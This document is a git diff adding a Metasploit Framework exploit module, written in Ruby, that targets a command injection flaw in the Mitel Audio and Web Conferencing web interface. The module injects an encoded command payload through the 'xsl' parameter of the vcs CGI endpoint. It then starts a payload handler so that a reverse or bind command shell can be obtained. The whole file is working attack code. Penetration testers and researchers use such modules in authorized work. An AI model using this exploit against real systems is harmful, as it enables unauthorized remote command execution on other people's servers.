diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb new file mode 100644 index 0000000000..3c14cb0b88 --- /dev/null +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -0,0 +1,84 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mitel Audio and Web Conferencing Command Injection', + 'Description' => %q{ + This module exploits a command injection flaw within the Mitel + Audio and Web Conferencing web interface. + }, + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + + ['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'], + # ['OSVDB', ''], + # ['CVE', ''], + # ['BID', ''] + ], + 'Platform' => ['unix', 'linux'], + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 1024, + 'BadChars' => "<>", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby bash telnet', + } + }, + 'Targets' => [ ['Automatic', { }], ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 12 2010' + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('URIPATH', [ true, "The path to the vcs cgi-bin binary", "/awcuser/cgi-bin/vcs" ]) + ], self.class) + end + + def exploit + print_status("Attempting to execute our command..") + + res = send_request_cgi( + { + 'uri' => datastore['URIPATH'], + 'method' => 'GET', + 'vars_get' => { + 'xml' => 'withXsl', + 'xsl' => ';' + payload.encoded + } + }, 10) + + if res and res.code.to_i > 200 + print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...") + return + end + + handler + end + +end